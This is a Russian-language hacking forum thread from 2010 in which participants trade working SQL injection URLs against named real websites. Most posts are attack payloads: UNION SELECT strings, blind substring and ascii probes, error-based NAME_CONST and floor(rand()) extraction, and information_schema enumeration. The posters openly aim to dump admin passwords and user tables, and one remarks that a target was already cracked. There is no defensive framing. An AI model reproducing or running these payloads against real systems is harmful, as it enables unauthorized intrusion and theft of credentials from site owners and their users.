20.10.2010, 20:37
|
|
Участник форума
Регистрация: 10.09.2009
Сообщений: 120
С нами:
8772211
Репутация:
56
|
|
Сообщение от IMMORTAL_S
Подскажите, где скачать скрипты для sql blind injection... когда-то качал с форума, сча не найду никак))
Вероятно, вот тут /thread119047-%C1%FB%F1%F2%F0%FB%E9.html
|
|
|
20.10.2010, 20:38
|
|
Новичок
Регистрация: 09.02.2009
Сообщений: 23
С нами:
9079073
Репутация:
-9
|
|
Сообщение от Redwood
Какая версия, каким запросом у тебя получилось ее определить и что ты увидел на странице ?
http://www.site.ru/index.php?id=106 and substring(@@version,1,1)=5
без ошибок - следовательно 5 версия.
R1dex мне подсобил уже с этой скулей,
вот такой запрос работает
24 and 1=0 union select 1,2,3,4,5,6,7,9,null,10
Собственно вот:
http://www.mibf.ru/index.php?id=24 and 1 =0 union select 1,2,3,4,5,6,7,9,0x3a,10-- 1
сейчас проверил, оказалось его уже вскрыли раньше меня
|
|
|
|
20.10.2010, 21:42
|
|
Познающий
Регистрация: 06.06.2008
Сообщений: 76
С нами:
9436363
Репутация:
55
|
|
вот такая трабла:
http://www.koisite.info/view_profile1.php?user=-2653%27+union+select+version%28%29+from+admin+limi t+0,1+--+
выводит версию в строку - 2004-00-27 даты
то есть вывод числовых значений без проблем
теперь пробуем вывести имя:
http://www.koisite.info/view_profile1.php?user=-2653'+union+select+loginname+from+admin+limit+0,1+--+
выводит 0000-00-00
думал попробовать покрутить через подзапросы, не не тут то было
http://www.koisite.info/view_profile1.php?user=2653%27+and%20substring%28v ersion%28%29,1,1%29=4+--+
выводит профиль
http://www.koisite.info/view_profile1.php?user=2653%27+and+ascii%28substri ng%28%28select%20pwd%20from%20admin+limit+0,1%29,1 ,1%29%29%3E0+--+
ругается и обрезает все что идет до select
http://www.koisite.info/view_profile1.php?user=2653%27+and+ascii%28substri ng%28%28/*!select*/%20pwd%20from%20admin+limit+0,1%29,1,1%29%29%3E0+--+
Сообщение от None
You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near 'select*/ pwd from admin limit 0,1),1,1))>0 -- '' at line 1
|
|
|
|
20.10.2010, 22:51
|
|
Новичок
Регистрация: 25.12.2009
Сообщений: 16
С нами:
8620050
Репутация:
0
|
|
Помогите раскрутить слепую sql:
http://www.ollis.ru/index.php?rest=-1') union select * FROM (select * FROM (select NAME_CONST((select pass FROM users LIMIT 1), 14)d) as t JOIN (select NAME_CONST((select pass FROM users LIMIT 1), 14)e) b)a--+
Не выводит не одно из полей, не login, не password, ничего короче, помогите пожалуйста.
|
|
|
|
20.10.2010, 23:02
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
С нами:
8885780
Репутация:
672
|
|
http://www.ollis.ru/index.php?rest=1')+or+1+group+by+concat(version(), floor(rand(0)*2))having+min(0)+or+1--+
Duplicate entry '5.0.221' for key 1
|
|
|
|
20.10.2010, 23:03
|
|
Новичок
Регистрация: 25.12.2009
Сообщений: 16
С нами:
8620050
Репутация:
0
|
|
Сообщение от Konqi
http://www.ollis.ru/index.php?rest=1')+or+1+group+by+concat(version(), floor(rand(0)*2))having+min(0)+or+1--+
Duplicate entry '5.0.221' for key 1
Я это знаю, как до значений таблицы дойти, пароли нужны)
|
|
|
|
20.10.2010, 23:04
|
|
Участник форума
Регистрация: 17.09.2008
Сообщений: 211
С нами:
9288132
Репутация:
571
|
|
2MastaBass1:
Ну так.. Table 'ollis.users' doesn't exist
Ищи свою табличку в другой бд..
|
|
|
|
20.10.2010, 23:06
|
|
Новичок
Регистрация: 25.12.2009
Сообщений: 16
С нами:
8620050
Репутация:
0
|
|
Сообщение от R1dex
2MastaBass1:
Ну так.. Table 'ollis.users' doesn't exist
Ищи свою табличку в другой бд..
Это тоже знаю, так как ее найти, перебором?
|
|
|
|
20.10.2010, 23:24
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
С нами:
8885780
Репутация:
672
|
|
http://ollis.ru/index.php?id=S00000645')+union+select * FROM (select * FROM (select NAME_CONST((select table_name FROM information_schema.tables+where+table_schema=datab ase() LIMIT 1), 14)d) as t JOIN (select NAME_CONST((select table_name FROM information_schema.tables+where+table_schema=datab ase() LIMIT 1), 14)e) b)a--+&type=ollis_picture&action=&mode=popup
перебирай лимит ом
|
|
|
|
20.10.2010, 23:36
|
|
Новичок
Регистрация: 25.12.2009
Сообщений: 16
С нами:
8620050
Репутация:
0
|
|
Сообщение от Konqi
http://ollis.ru/index.php?id=S00000645')+union+select * FROM (select * FROM (select NAME_CONST((select table_name FROM information_schema.tables+where+table_schema=datab ase() LIMIT 1), 14)d) as t JOIN (select NAME_CONST((select table_name FROM information_schema.tables+where+table_schema=datab ase() LIMIT 1), 14)e) b)a--+&type=ollis_picture&action=&mode=popup
перебирай лимит ом
Просто лимит 1 потом 2 и т.д.? Не догнал...
Делаю так
http://www.ollis.ru/index.php?rest=-1') union select * FROM (select * FROM (select NAME_CONST((select user FROM _access LIMIT 1), 14)d) as t JOIN (select NAME_CONST((select user FROM _access LIMIT 1), 14)e) b)a--+
гонит Unknown column 'user' in 'field list'
побывал и логин и много чего
|
|
|
|
|
 |
|
|
Здесь присутствуют: 2 (пользователей: 0 , гостей: 2)
|
|
|
|
Похожие темы
Комбинированный вид
